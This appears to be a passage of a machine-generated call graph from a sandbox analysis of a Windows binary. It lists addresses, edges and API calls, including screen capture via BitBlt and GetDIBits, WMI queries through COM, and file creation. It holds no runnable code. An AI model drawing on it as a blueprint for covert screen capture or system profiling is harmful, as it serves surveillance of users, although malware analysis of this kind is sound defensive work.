32ecb29 12497->12588 12500 32e3649 12499->12500 12501 32ed224 8 API calls 12500->12501 12503 32e3664 12501->12503 12502 32e366d 12513 32e2e49 12502->12513 12503->12502 12595 32e8d70 RtlAllocateHeap 12503->12595 12505 32e3681 12512 32e368b 12505->12512 12596 32ecea4 12505->12596 12507 32e8d86 2 API calls 12507->12502 12511 32ea3a2 6 API calls 12511->12512 12512->12507 12514 32eab09 4 API calls 12513->12514 12515 32e2e67 12514->12515 12609 32e2d93 12515->12609 12518 32e2d93 3 API calls 12519 32e2e8e 12518->12519 12613 32eab55 12519->12613 12522 32e2ee2 12530 32e41aa 12522->12530 12561 32ef554 12560->12561 12562 32ef590 12560->12562 12573 32e8d70 RtlAllocateHeap 12561->12573 12563 32e9f75 2 API calls 12562->12563 12565 32ef59a 12563->12565 12567 32e9a1d RtlAllocateHeap 12565->12567 12566 32ef565 12569 32ef5b3 12566->12569 12571 32e8d86 2 API calls 12566->12571 12568 32ef5a6 12567->12568 12570 32e8d2e 2 API calls 12568->12570 12569->12462 12570->12569 12572 32ef589 12571->12572 12572->12462 12573->12566 12574->12466 12576 32ea302 12575->12576 12577 32ea327 12576->12577 12578 32e8d86 2 API calls 12576->12578 12579 32ea33d 12576->12579 12580 32e8f0a memset 12577->12580 12578->12577 12579->12468 12580->12579 12581->12469 12582->12491 12583->12494 12585 32e7484 12584->12585 12586 32ef159 8 API calls 12585->12586 12587 32e7496 12586->12587 12587->12492 12589 32ecb40 12588->12589 12590 32e9f8f 2 API calls 12589->12590 12594 32ecb5f 12589->12594 12591 32ecb6e lstrcmpiW 12590->12591 12592 32ecb84 12591->12592 12593 32e8d41 2 API calls 12592->12593 12593->12594 12594->12499 12595->12505 12604 32ecd19 12596->12604 12599 32ecc83 12600 32e9f8f 2 API calls 12599->12600 12601 32ecca9 12600->12601 12602 32e8d41 2 API calls 12601->12602 12603 32e36e5 12602->12603 12603->12511 12605 32e8f0a memset 12604->12605 12606 32ecd50 12605->12606 12607 32e3697 12606->12607 12608 32ece0a LocalAlloc 12606->12608 12607->12512 12607->12599 12608->12607 12610 32e2d9d 12609->12610 12611 32e2db4 12609->12611 12612 32e8e04 3 API calls 12610->12612 12611->12518 12612->12611 12632 32eab5f 12613->12632 12616 32e9cd0 12618 32e9ce4 12616->12618 12633 32eacbd 4 API calls 12632->12633 12634 32e2e99 12633->12634 12634->12522 12634->12616 13001 32e5f3a 13007 32e8d70 RtlAllocateHeap 13001->13007 13003 32e5fb8 13005 32ea202 GetSystemTimeAsFileTime 13006 32e5f4f 13005->13006 13006->13003 13006->13005 13008 32e5cc4 GetDC 13006->13008 13007->13006 13009 32e5ee4 13008->13009 13010 32e5cf6 CreateCompatibleDC 13008->13010 13011 32e8d86 2 API calls 13009->13011 13010->13009 13012 32e5d07 GetDeviceCaps GetDeviceCaps CreateCompatibleBitmap 13010->13012 13013 32e5f03 13011->13013 13012->13009 13014 32e5d32 SelectObject 13012->13014 13015 32e8d86 2 API calls 13013->13015 13014->13009 13016 32e5d45 BitBlt GetCursorInfo 13014->13016 13019 32e5f0e 13015->13019 13017 32e5dcb SelectObject 13016->13017 13018 32e5d76 13016->13018 13017->13009 13021 32e5ddf GetObjectW 13017->13021 13018->13017 13020 32e5d7b CopyIcon GetIconInfo GetObjectW DrawIconEx 13018->13020 13022 32e5f1c 13019->13022 13023 32e5f15 DeleteDC 13019->13023 13020->13017 13034 32e8d70 RtlAllocateHeap 13021->13034 13025 32e5f27 13022->13025 13026 32e5f20 DeleteDC 13022->13026 13023->13022 13028 32e5f2b DeleteObject 13025->13028 13029 32e5f32 13025->13029 13026->13025 13027 32e5e48 13027->13009 13030 32e5e54 GetDIBits 13027->13030 13028->13029 13029->13006 13035 32e8d70 RtlAllocateHeap 13030->13035 13032 32e5e7a 13032->13009 13036 32efc7b 13032->13036 13034->13027 13035->13032 13046 32e8d70 RtlAllocateHeap 13036->13046 13038 32efc9b 13045 32efd33 13038->13045 13047 32f5820 13038->13047 13040 32e8d86 2 API calls 13041 32efd51 13040->13041 13041->13009 13043 32e8e04 3 API calls 13044 32efcc6 13043->13044 13044->13043 13044->13045 13050 32f4c40 13044->13050 13045->13040 13046->13038 13087 32f55e0 13047->13087 13049 32f583c 13049->13044 13051 32f4c51 13050->13051 13052 32f4cfa 13051->13052 13053 32f5f00 memcpy 13051->13053 13064 32f4cae 13051->13064 13052->13044 13053->13064 13054 32f4f99 memcpy 13055 32f4fc6 13054->13055 13055->13052 13058 32f51ad 13055->13058 13069 32f5f00 memcpy 13055->13069 13056 32f4f21 memcpy 13066 32f4ed8 13056->13066 13057 32f4d18 13057->13052 13059 32f5f00 memcpy 13057->13059 13057->13066 13058->13052 13063 32f526f 13058->13063 13074 32f5f00 memcpy 13058->13074 13059->13066 13060 32f534b 13068 32f5356 13060->13068 13076 32f535d 13060->13076 13061 32f5344 13098 32f4180 13061->13098 13062 32f5f00 memcpy 13062->13066 13070 32f5f00 memcpy 13063->13070 13072 32f52c1 13063->13072 13073 32f530a 13063->13073 13064->13052 13064->13057 13071 32f5f00 memcpy 13064->13071 13065 32f5f00 memcpy 13065->13073 13066->13052 13066->13054 13066->13055 13066->13056 13066->13062 13120 32f5990 13068->13120 13069->13055 13070->13072 13071->13057 13072->13052 13072->13065 13073->13052 13073->13060 13073->13061 13078 32f5413 13073->13078 13074->13058 13081 32f5349 13076->13081 13136 32f5af0 13076->13136 13078->13052 13079 32f5f00 memcpy 13078->13079 13080 32f54e4 13079->13080 13080->13044 13081->13052 13081->13078 13082 32f71a0 memcpy 13081->13082 13086 32f53a7 13081->13086 13084 32f53c3 13082->13084 13083 32f5f00 memcpy 13083->13078 13085 32f53cb memset 13084->13085 13084->13086 13085->13086 13086->13083 13088 32f57dd 13087->13088 13089 32f55f5 13087->13089 13088->13049 13089->13088 13092 32f5850 13089->13092 13093 32f585e 13092->13093 13094 32f57d3 13093->13094 13096 32f5f50 memset 13093->13096 13094->13049 13097 32f89b4 13096->13097 13097->13094 13107 32f41b0 13098->13107 13099 32f42d9 13100 32f4319 13099->13100 13101 32f42f1 memcpy 13099->13101 13106 32f4373 13099->13106 13102 32f4325 memcpy 13100->13102 13103 32f4350 memcpy 13100->13103 13101->13106 13102->13103 13104 32f4349 13102->13104 13103->13106 13104->13103 13105 32f71a0 memcpy 13105->13107 13108 32f4427 13106->13108 13110 32f4401 memcpy 13106->13110 13113 32f43a4 13106->13113 13107->13099 13107->13105 13109 32f5f00 memcpy 13107->13109 13112 32f4278 memcpy 13107->13112 13114 32f6040 memcpy 13107->13114 13111 32f6040 memcpy 13108->13111 13116 32f4464 13108->13116 13109->13107 13110->13108 13111->13116 13112->13107 13113->13081 13114->13107 13115 32f4502 13115->13081 13116->13115 13117 32f71a0 memcpy 13116->13117 13118 32f44f5 13117->13118 13119 32f5f00 memcpy 13118->13119 13119->13115 13126 32f5998 13120->13126 13121 32f5d70 4 API calls 13121->13126 13122 32f5a49 13123 32f5a43 13122->13123 13125 32f5a5f 13122->13125 13129 32f5a9f 13122->13129 13123->13081 13124 32f6f10 memcpy 13124->13126 13128 32f6f10 memcpy 13125->13128 13126->13121 13126->13122 13126->13123 13126->13124 13127 32f5f00 memcpy 13126->13127 13127->13126 13131 32f5a7e 13128->13131 13129->13123 13130 32f6f10 memcpy 13129->13130 13132 32f5ac7 13130->13132 13133 32f5f00 memcpy 13131->13133 13134 32f5f00 memcpy 13132->13134 13135 32f5a8b 13133->13135 13134->13123 13135->13081 13143 32f5af9 13136->13143 13137 32f5d70 4 API calls 13137->13143 13138 32f5cc4 13138->13081 13139 32f5ccb 13140 32f5cda 13139->13140 13144 32f5d1b 13139->13144 13142 32f6f10 memcpy 13140->13142 13141 32f6f10 memcpy 13141->13143 13145 32f5cf9 13142->13145 13143->13137 13143->13138 13143->13139 13143->13141 13146 32f5f00 memcpy 13143->13146 13144->13138 13147 32f6f10 memcpy 13144->13147 13148 32f5f00 memcpy 13145->13148 13146->13143 13149 32f5d43 13147->13149 13151 32f5d06 13148->13151 13150 32f5f00 memcpy 13149->13150 13150->13138 13151->13081 13156 32e2235 13157 32e9890 2 API calls 13156->13157 13158 32e226c 13157->13158 13159 32ebfd9 2 API calls 13158->13159 13160 32e2284 13159->13160 13161 32e228b 13160->13161 13179 32ec4e2 memset 13160->13179 13163 32e8d86 2 API calls 13161->13163 13171 32e23d5 13163->13171 13164 32e23fc 13166 32e9dc9 2 API calls 13164->13166 13165 32e23f1 13168 32e8d86 2 API calls 13165->13168 13170 32e2409 13166->13170 13167 32e8d86 2 API calls 13167->13171 13168->13164 13169 32e9f8f 2 API calls 13172 32e229b 13169->13172 13171->13164 13171->13165 13171->13167 13172->13161 13172->13169 13173 32eb604 CreateFileW 13172->13173 13174 32e8d86 RtlFreeHeap memset 13172->13174 13175 32e109a 2 API calls 13172->13175 13176 32e9bf7 RtlAllocateHeap lstrcatW 13172->13176 13177 32e8d41 RtlFreeHeap memset 13172->13177 13178 32eb798 memset GetExitCodeProcess 13172->13178 13173->13172 13174->13172 13175->13172 13176->13172 13177->13172 13178->13172 13194 32e8d70 RtlAllocateHeap 13179->13194 13181 32ec509 13182 32e9a5a RtlAllocateHeap 13181->13182 13193 32ec58d 13181->13193 13183 32ec527 13182->13183 13184 32e9a5a RtlAllocateHeap 13183->13184 13185 32ec53a 13184->13185 13186 32e9a5a RtlAllocateHeap 13185->13186 13187 32ec54e 13186->13187 13188 32e9f8f 2 API calls 13187->13188 13189 32ec55b 13188->13189 13190 32e8d41 2 API calls 13189->13190 13191 32ec581 13190->13191 13192 32e9a5a RtlAllocateHeap 13191->13192 13192->13193 13193->13172 13194->13181 14517 32e268d 14519 32e269e 14517->14519 14523 32e26b6 14517->14523 14525 32e7047 14519->14525 14522 32e9dc9 2 API calls 14524 32e26cf 14522->14524 14550 32e2654 14523->14550 14526 32e7069 14525->14526 14541 32e7061 14525->14541 14527 32ebfd9 2 API calls 14526->14527 14528 32e7072 14527->14528 14528->14541 14557 32f0eab 14528->14557 14531 32e708c 14532 32e8d86 2 API calls 14531->14532 14532->14541 14533 32e993a 7 API calls 14534 32e70c2 14533->14534 14535 32e66ae 5 API calls 14534->14535 14534->14541 14536 32e70d4 14535->14536 14537 32e70f9 14536->14537 14538 32e70e1 14536->14538 14540 32eb604 CreateFileW 14537->14540 14539 32e8d86 2 API calls 14538->14539 14539->14541 14542 32e7107 14540->14542 14541->14523 14543 32e5bab 8 API calls 14542->14543 14549 32e7119 14542->14549 14546 32e7115 14543->14546 14544 32e8d86 2 API calls 14545 32e714b 14544->14545 14547 32e8d86 2 API calls 14545->14547 14548 32eac02 6 API calls 14546->14548 14546->14549 14547->14531 14548->14549 14549->14544 14551 32ebfd9 2 API calls 14550->14551 14552 32e2665 14551->14552 14555 32e2689 14552->14555 14556 32e267c 14552->14556 14568 32eadcc 14552->14568 14553 32e8d86 2 API calls 14553->14555 14555->14522 14556->14553 14558 32f0eba 14557->14558 14559 32f0ef6 14557->14559 14561 32e8d86 2 API calls 14558->14561 14567 32e8d70 RtlAllocateHeap 14559->14567 14562 32f0ec3 14561->14562 14563 32e7086 14562->14563 14564 32e8dd5 RtlAllocateHeap 14562->14564 14563->14531 14563->14533 14565 32f0eda 14564->14565 14565->14563 14566 32efc1c lstrlenW 14565->14566 14566->14563 14567->14562 14569 32eade8 6 API calls 14568->14569 14570 32eade3 14569->14570 14570->14556 13515 32e1e01 13516 32e1e1e 13515->13516 13528 32e1e19 13515->13528 13529 32e9c4c 13516->13529 13518 32e8d86 2 API calls 13520 32e1e77 13518->13520 13521 32e9dc9 2 API calls 13520->13521 13523 32e1e83 13521->13523 13522 32e9acd 2 API calls 13524 32e1e3a 13522->13524 13525 32eb798 2 API calls 13524->13525 13524->13528 13526 32e1e4f 13525->13526 13527 32e8d86 2 API calls 13526->13527 13527->13528 13528->13518 13531 32e9c63 13529->13531 13536 32e8d70 RtlAllocateHeap 13531->13536 13532 32e1e27 13532->13522 13532->13528 13533 32e9ca4 lstrcatA 13534 32e9cb8 lstrcatA 13533->13534 13535 32e9c99 13533->13535 13534->13535 13535->13532 13535->13533 13536->13535 14596 32e1295 14597 32eaaba 4 API calls 14596->14597 14598 32e12ac 14597->14598 14599 32e12d1 14598->14599 14600 32f36f2 2 API calls 14598->14600 14601 32e117d 5 API calls 14599->14601 14600->14599 14602 32e12fa 14601->14602 14603 32eab8d 4 API calls 14602->14603 14625 32e1306 14602->14625 14604 32e1316 14603->14604 14605 32e7c0e 50 API calls 14604->14605 14633 32e13d4 14604->14633 14607 32e1334 14605->14607 14606 32eb316 4 API calls 14608 32e13eb 14606->14608 14610 32e1371 14607->14610 14612 32eab8d 4 API calls 14607->14612 14623 32e133d 14607->14623 14609 32eb403 5 API calls 14608->14609 14611 32e13f7 14609->14611 14614 32eb316 4 API calls 14610->14614 14802 32e7a4e 14611->14802 14615 32e1368 14612->14615 14617 32e138d 14614->14617 14615->14610 14634 32e6935 14615->14634 14621 32eb403 5 API calls 14617->14621 14618 32e8d86 2 API calls 14618->14625 14619 32e143e 14619->14623 14628 32e110a 8 API calls 14619->14628 14620 32e142c 14626 32e110a 8 API calls 14620->14626 14622 32e1399 14621->14622 14785 32e7cb6 14622->14785 14623->14618 14629 32e1438 14626->14629 14628->14629 14831 32e10ba 14629->14831 14633->14606 14839 32e8d70 RtlAllocateHeap 14634->14839 14636 32e694b 14637 32eab09 4 API calls 14636->14637 14784 32e6e47 14636->14784 14638 32e6960 14637->14638 14840 32efd5a 14638->14840 14643 32e9a5a RtlAllocateHeap 14644 32e6984 14643->14644 14645 32e9a5a RtlAllocateHeap 14644->14645 14646 32e6998 14645->14646 14647 32e69bd 14646->14647 14648 32e9a5a RtlAllocateHeap 14646->14648 14649 32e9a5a RtlAllocateHeap 14647->14649 14648->14647 14650 32e69e2 14649->14650 14866 32ee8c9 14650->14866 14656 32e6a51 14657 32e6a76 14656->14657 14913 32e8d70 RtlAllocateHeap 14656->14913 14659 32e109a 2 API calls 14657->14659 14661 32e6aa5 14659->14661 14660 32e6a62 14660->14657 14914 32ebba6 14660->14914 14918 32eb84b 14661->14918 14665 32e8d41 2 API calls 14666 32e6abf 14665->14666 14667 32e109a 2 API calls 14666->14667 14668 32e6acb 14667->14668 14669 32eb84b 5 API calls 14668->14669 14670 32e6ad6 14669->14670 14671 32e8d41 2 API calls 14670->14671 14672 32e6ae5 14671->14672 14673 32e109a 2 API calls 14672->14673 14674 32e6aed 14673->14674 14675 32eb84b 5 API calls 14674->14675 14676 32e6af8 14675->14676 14677 32e8d41 2 API calls 14676->14677 14678 32e6b07 14677->14678 14679 32e109a 2 API calls 14678->14679 14680 32e6b13 14679->14680 14681 32eb84b 5 API calls 14680->14681 14682 32e6b1e 14681->14682 14683 32e8d41 2 API calls 14682->14683 14684 32e6b2d 14683->14684 14685 32e6b7f 14684->14685 14686 32e109a 2 API calls 14684->14686 14687 32e109a 2 API calls 14685->14687 14688 32e6b46 14686->14688 14689 32e6b8c 14687->14689 14690 32e9fee 2 API calls 14688->14690 14691 32eb84b 5 API calls 14689->14691 14692 32e6b68 14690->14692 14693 32e6b97 14691->14693 14695 32e8d41 2 API calls 14692->14695 14694 32e8d41 2 API calls 14693->14694 14696 32e6ba6 14694->14696 14697 32e6b71 14695->14697 14698 32e109a 2 API calls 14696->14698 14699 32eb84b 5 API calls 14697->14699 14700 32e6bb2 14698->14700 14699->14685 14701 32eb84b 5 API calls 14700->14701 14702 32e6bbd 14701->14702 14703 32e8d41 2 API calls 14702->14703 14704 32e6bcc 14703->14704 14705 32e109a 2 API calls 14704->14705 14706 32e6bd8 14705->14706 14707 32eb84b 5 API calls 14706->14707 14708 32e6be3 14707->14708 14709 32e8d41 2 API calls 14708->14709 14710 32e6bf2 14709->14710 14711 32e109a 2 API calls 14710->14711 14712 32e6bfe 14711->14712 14713 32eb84b 5 API calls 14712->14713 14714 32e6c09 14713->14714 14715 32e8d41 2 API calls 14714->14715 14716 32e6c18 14715->14716 14717 32e109a 2 API calls 14716->14717 14718 32e6c24 14717->14718 14719 32eb84b 5 API calls 14718->14719 14720 32e6c2f 14719->14720 14721 32e8d41 2 API calls 14720->14721 14722 32e6c3e 14721->14722 14723 32e109a 2 API calls 14722->14723 14724 32e6c4a 14723->14724 14725 32eb84b 5 API calls 14724->14725 14726 32e6c55 14725->14726 14727 32e8d41 2 API calls 14726->14727 14728 32e6c64 14727->14728 14729 32e109a 2 API calls 14728->14729 14730 32e6c70 14729->14730 14731 32eb84b 5 API calls 14730->14731 14732 32e6c7b 14731->14732 14733 32e8d41 2 API calls 14732->14733 14734 32e6c8a 14733->14734 14936 32e8d70 RtlAllocateHeap 14734->14936 14736 32e6cb2 14737 32e9f8f 2 API calls 14736->14737 14736->14784 14738 32e6ccb 14737->14738 14739 32e9f8f 2 API calls 14738->14739 14740 32e6cda 14739->14740 14741 32e9f8f 2 API calls 14740->14741 14742 32e6ceb 14741->14742 14743 32e9f8f 2 API calls 14742->14743 14744 32e6cfa 14743->14744 14745 32e9f8f 2 API calls 14744->14745 14746 32e6d09 14745->14746 14747 32e9f8f 2 API calls 14746->14747 14748 32e6d18 14747->14748 14749 32e9f8f 2 API calls 14748->14749 14750 32e6d27 14749->14750 14751 32e9f8f 2 API calls 14750->14751 14752 32e6d36 14751->14752 14753 32e9f8f 2 API calls 14752->14753 14754 32e6d46 14753->14754 14937 32eeb47 14754->14937 14757 32eeb47 26 API calls 14758 32e6d7a 14757->14758 14784->14610 14786 32f053f GetTickCount 14785->14786 14787 32e7cd6 14786->14787 15021 32e80ed 14787->15021 15192 32e98ac 14802->15192 14805 32f053f GetTickCount 14806 32e7a95 14805->14806 15198 32e7eb9 14806->15198 14808 32e1420 14808->14619 14808->14620 14809 32e7ab5 14809->14808 14810 32e769f 19 API calls 14809->14810 14812 32e7ae5 14810->14812 14811 32e7aec 14813 32e8d86 2 API calls 14811->14813 14812->14811 14816 32e7639 8 API calls 14812->14816 14814 32e7bee 14813->14814 14815 32e8d86 2 API calls 14814->14815 14817 32e7bf9 14815->14817 14818 32e7b16 14816->14818 14819 32e8d86 2 API calls 14817->14819 14818->14811 15237 32e78e6 14818->15237 14819->14808 14821 32e7b41 14821->14811 15250 32e77b6 14821->15250 14824 32e110a 8 API calls 14825 32e7b81 14824->14825 14826 32e8f0a memset 14825->14826 14827 32e7b8d 14825->14827 14828 32e7ba2 14826->14828 15264 32e7765 14827->15264 14829 32e1d6e 6 API calls 14828->14829 14829->14827 14832 32e10da 14831->14832 14833 32e10c6 14831->14833 14834 32eab09 4 API calls 14832->14834 14835 32eab09 4 API calls 14833->14835 14836 32e10cd 14834->14836 14835->14836 14837 32e9faf 2 API calls 14836->14837 14838 32e10fd 14837->14838 14838->14623 14839->14636 14841 32e9faf 2 API calls 14840->14841 14842 32e696b 14841->14842 14843 32ee815 14842->14843 14844 32e9f8f 2 API calls 14843->14844 14845 32ee82a 14844->14845 14992 32ee503 CoInitializeEx CoInitializeSecurity CoCreateInstance 14845->14992 14848 32e8d41 2 API calls 14849 32ee842 14848->14849 14850 32e9f8f 2 API calls 14849->14850 14865 32e6970 14849->14865 14851 32ee856 14850->14851 14852 32e9f8f 2 API calls 14851->14852 14853 32ee867 14852->14853 14999 32ee759 SysAllocString SysAllocString 14853->14999 14855 32ee878 14856 32ee8a6 14855->14856 14857 32e9a5a RtlAllocateHeap 14855->14857 14858 32e8d41 2 API calls 14856->14858 14861 32ee887 VariantClear 14857->14861 14859 32ee8af 14858->14859 14862 32e8d41 2 API calls 14859->14862 14861->14856 14863 32ee8b8 14862->14863 15005 32ee5b7 14863->15005 14865->14643 14867 32e9f8f 2 API calls 14866->14867 14868 32ee8db 14867->14868 14869 32ee503 6 API calls 14868->14869 14870 32ee8e5 14869->14870 14871 32e8d41 2 API calls 14870->14871 14872 32ee8f3 14871->14872 14873 32e9f8f 2 API calls 14872->14873 14888 32e6a24 14872->14888 14874 32ee907 14873->14874 14875 32e9f8f 2 API calls 14874->14875 14876 32ee918 14875->14876 14877 32ee759 10 API calls 14876->14877 14878 32ee929 14877->14878 14879 32ee957 14878->14879 14881 32e9a5a RtlAllocateHeap 14878->14881 14880 32e8d41 2 API calls 14879->14880 14882 32ee960 14880->14882 14883 32ee938 VariantClear 14881->14883 14884 32e8d41 2 API calls 14882->14884 14883->14879 14886 32ee969 14884->14886 14887 32ee5b7 2 API calls 14886->14887 14887->14888 14889 32ee97a 14888->14889 14890 32e9f8f 2 API calls 14889->14890 14891 32ee98f 14890->14891 14892 32ee503 6 API calls 14891->14892 14893 32ee999 14892->14893 14894 32e8d41 2 API calls 14893->14894 14895 32ee9a7 14894->14895 14896 32e6a2c 14895->14896 14897 32e9f8f 2 API calls 14895->14897 14912 32e8d70 RtlAllocateHeap 14896->14912 14898 32ee9b8 14897->14898 14899 32e9f8f 2 API calls 14898->14899 14900 32ee9c9 14899->14900 14901 32ee759 10 API calls 14900->14901 14902 32ee9da 14901->14902 14903 32eea08 14902->14903 14905 32e9a5a RtlAllocateHeap 14902->14905 14904 32e8d41 2 API calls 14903->14904 14906 32eea11 14904->14906 14907 32ee9e9 VariantClear 14905->14907 14908 32e8d41 2 API calls 14906->14908 14907->14903 14910 32eea1a 14908->14910 14911 32ee5b7 2 API calls 14910->14911 14911->14896 14912->14656 14913->14660 14915 32ebbc2 14914->14915 14916 32e8f0a memset 14915->14916 14917 32ebbe0 14915->14917 14916->14917 14917->14657 14919 32e8f0a memset 14918->14919 14920 32eb88f 14919->14920 14921 32e8f0a memset 14920->14921 14922 32eb89b 14921->14922 14923 32eb9f3 14922->14923 14926 32e6ab0 14922->14926 15010 32e8d70 RtlAllocateHeap 14922->15010 14924 32e8d86 2 API calls 14923->14924 14924->14926 14926->14665 14927 32e9a1d RtlAllocateHeap 14929 32eb90a 14927->14929 14928 32e9ba4 2 API calls 14928->14929 14929->14923 14929->14926 14929->14927 14929->14928 14930 32e8d86 2 API calls 14929->14930 14931 32eb9b9 14929->14931 14930->14929 14931->14923 14932 32e9acd 2 API calls 14931->14932 14933 32eb9dc 14932->14933 14933->14923 14934 32eb9e2 14933->14934 14935 32e8d86 2 API calls 14934->14935 14935->14926 14936->14736 14938 32ee503 6 API calls 14937->14938 14939 32eeb68 14938->14939 14940 32e6d5e 14939->14940 15011 32e8d70 RtlAllocateHeap 14939->15011 14940->14757 14942 32eeb7c 14944 32e9f8f 2 API calls 14942->14944 14960 32eebdf 14942->14960 14943 32e8d86 2 API calls 14946 32eeb94 14944->14946 14960->14943 14993 32ee548 SysAllocString 14992->14993 14995 32ee585 14992->14995 14994 32ee563 14993->14994 14994->14995 14996 32ee567 CoSetProxyBlanket 14994->14996 14995->14848 14996->14995 14997 32ee57e 14996->14997 15009 32e8d70 RtlAllocateHeap 14997->15009 15000 32e9f8f 2 API calls 14999->15000 15001 32ee784 SysAllocString 15000->15001 15002 32e8d41 2 API calls 15001->15002 15004 32ee797 SysFreeString SysFreeString SysFreeString 15002->15004 15004->14855 15006 32ee5c2 15005->15006 15007 32e8d86 2 API calls 15006->15007 15008 32ee5df 15007->15008 15008->14865 15009->14995 15010->14929 15011->14942 15022 32f11d0 7 API calls 15021->15022 15023 32e80fd 15022->15023 15024 32e88ce strncpy 15023->15024 15025 32e8116 15024->15025 15026 32e88ce strncpy 15025->15026 15027 32e812a 15026->15027 15028 32e88ce strncpy 15027->15028 15029 32e813b 15028->15029 15030 32e88ce strncpy 15029->15030 15031 32e814e 15030->15031 15032 32e88ce strncpy 15031->15032 15033 32e8164 15032->15033 15034 32e88ce strncpy 15033->15034 15035 32e8178 15034->15035 15036 32e88ce strncpy 15035->15036 15037 32e8191 15036->15037 15038 32e88ce strncpy 15037->15038 15039 32e81a5 15038->15039 15040 32e88ce strncpy 15039->15040 15041 32e81b9 15040->15041 15042 32e88ce strncpy 15041->15042 15043 32e81cd 15042->15043 15044 32e88ce strncpy 15043->15044 15045 32e81e3 15044->15045 15046 32e88ce strncpy 15045->15046 15047 32e81fa 15046->15047 15177 32e892a 15047->15177 15050 32e88ce strncpy 15051 32e820d 15050->15051 15052 32e88ce strncpy 15051->15052 15053 32e8221 15052->15053 15054 32e88ce strncpy 15053->15054 15055 32e8235 15054->15055 15056 32e892a 5 API calls 15055->15056 15057 32e823d 15056->15057 15058 32e88ce strncpy 15057->15058 15059 32e8248 15058->15059 15060 32e892a 5 API calls 15059->15060 15061 32e8250 15060->15061 15062 32e88ce strncpy 15061->15062 15063 32e825b 15062->15063 15064 32e892a 5 API calls 15063->15064 15065 32e8263 15064->15065 15066 32e88ce strncpy 15065->15066 15067 32e826e 15066->15067 15068 32e88ce strncpy 15067->15068 15069 32e8282 15068->15069 15070 32e892a 5 API calls 15069->15070 15071 32e828a 15070->15071 15072 32e88ce strncpy 15071->15072 15073 32e8295 15072->15073 15074 32e88ce strncpy 15073->15074 15075 32e82af 15074->15075 15076 32e892a 5 API calls 15075->15076 15077 32e82b7 15076->15077 15078 32e88ce strncpy 15077->15078 15079 32e82c2 15078->15079 15080 32e88ce strncpy 15079->15080 15081 32e82d6 15080->15081 15082 32e88ce strncpy 15081->15082 15083 32e82ea 15082->15083 15084 32e892a 5 API calls 15083->15084 15085 32e82fe 15084->15085 15086 32e88ce strncpy 15085->15086 15087 32e8309 15086->15087 15088 32e88ce strncpy 15087->15088 15089 32e831d 15088->15089 15090 32e88ce strncpy 15089->15090 15091 32e8331 15090->15091 15092 32e892a 5 API calls 15091->15092 15093 32e833c 15092->15093 15094 32e88ce strncpy 15093->15094 15095 32e8347 15094->15095 15096 32e892a 5 API calls 15095->15096 15097 32e8352 15096->15097 15098 32e88ce strncpy 15097->15098 15099 32e835d 15098->15099 15100 32e892a 5 API calls 15099->15100 15101 32e8368 15100->15101 15102 32e88ce strncpy 15101->15102 15103 32e8373 15102->15103 15104 32e892a 5 API calls 15103->15104 15105 32e837e 15104->15105 15106 32e88ce strncpy 15105->15106 15107 32e8389 15106->15107 15108 32e892a 5 API calls 15107->15108 15109 32e8394 15108->15109 15110 32e88ce strncpy 15109->15110 15111 32e839f 15110->15111 15112 32e892a 5 API calls 15111->15112 15113 32e83aa 15112->15113 15114 32e88ce strncpy 15113->15114 15115 32e83b5 15114->15115 15116 32e892a 5 API calls 15115->15116 15117 32e83c0 15116->15117 15118 32e88ce strncpy 15117->15118 15119 32e83cb 15118->15119 15120 32e892a 5 API calls 15119->15120 15121 32e83d6 15120->15121 15122 32e88ce strncpy 15121->15122 15123 32e83e1 15122->15123 15124 32e892a 5 API calls 15123->15124 15125 32e83ec 15124->15125 15126 32e88ce strncpy 15125->15126 15127 32e83f7 15126->15127 15128 32e892a 5 API calls 15127->15128 15129 32e8405 15128->15129 15130 32e88ce strncpy 15129->15130 15131 32e8410 15130->15131 15132 32e892a 5 API calls 15131->15132 15133 32e841b 15132->15133 15134 32e88ce strncpy 15133->15134 15135 32e8426 15134->15135 15136 32e892a 5 API calls 15135->15136 15137 32e8431 15136->15137 15138 32e88ce strncpy 15137->15138 15139 32e843c 15138->15139 15140 32e892a 5 API calls 15139->15140 15141 32e8447 15140->15141 15142 32e88ce strncpy 15141->15142 15143 32e8452 15142->15143 15144 32e892a 5 API calls 15143->15144 15145 32e845d 15144->15145 15146 32e88ce strncpy 15145->15146 15170 32e8468 15146->15170 15149 32e850f 15150 32e88ce strncpy 15149->15150 15167 32e8522 15150->15167 15152 32e859d 15153 32e88ce strncpy 15152->15153 15168 32e85b0 15153->15168 15154 32e862b 15158 32e88ce strncpy 15154->15158 15155 32ebf67 RtlAllocateHeap 15155->15170 15156 32e87b6 15157 32f11d0 7 API calls 15157->15167 15174 32e863e 15158->15174 15159 32f11d0 7 API calls 15159->15168 15161 32f11d0 7 API calls 15161->15170 15162 32f11d0 7 API calls 15162->15174 15163 32e892a 5 API calls 15163->15168 15164 32e88ce strncpy 15164->15168 15165 32e892a RtlAllocateHeap RtlFreeHeap memset WideCharToMultiByte WideCharToMultiByte 15165->15167 15166 32e88ce strncpy 15166->15170 15167->15152 15167->15157 15167->15165 15167->15168 15169 32e88ce strncpy 15167->15169 15168->15154 15168->15159 15168->15163 15168->15164 15168->15174 15169->15167 15170->15149 15170->15155 15170->15161 15170->15166 15170->15167 15171 32e88ce strncpy 15171->15174 15172 32e9a91 2 API calls 15172->15174 15173 32e892a RtlAllocateHeap RtlFreeHeap memset WideCharToMultiByte WideCharToMultiByte 15173->15174 15174->15156 15174->15162 15174->15171 15174->15172 15174->15173 15175 32f12b0 strncpy 15174->15175 15176 32e8d86 2 API calls 15174->15176 15175->15174 15176->15174 15182 32e9b09 15177->15182 15179 32e8202 15179->15050 15180 32e893d 15180->15179 15181 32e8d86 2 API calls 15180->15181 15181->15179 15183 32e9b18 WideCharToMultiByte 15182->15183 15185 32e9b68 15182->15185 15184 32e9b33 15183->15184 15183->15185 15191 32e8d70 RtlAllocateHeap 15184->15191 15185->15180 15187 32e9b3c 15187->15185 15188 32e9b44 WideCharToMultiByte 15187->15188 15188->15185 15189 32e9b5d 15188->15189 15190 32e8d86 2 API calls 15189->15190 15190->15185 15191->15187 15193 32e98ba 15192->15193 15194 32f36f2 2 API calls 15193->15194 15195 32e9904 15194->15195 15196 32e7a90 15195->15196 15197 32f36f2 2 API calls 15195->15197 15196->14805 15197->15195 15199 32f11d0 7 API calls 15198->15199 15200 32e7ec8 15199->15200 15201 32e88ce strncpy 15200->15201 15202 32e7ede 15201->15202 15203 32e88ce strncpy 15202->15203 15204 32e7ef3 15203->15204 15205 32e88ce strncpy 15204->15205 15206 32e7f07 15205->15206 15207 32e88ce strncpy 15206->15207 15208 32e7f1c 15207->15208 15209 32e88ce strncpy 15208->15209 15210 32e7f2d 15209->15210 15211 32e88ce strncpy 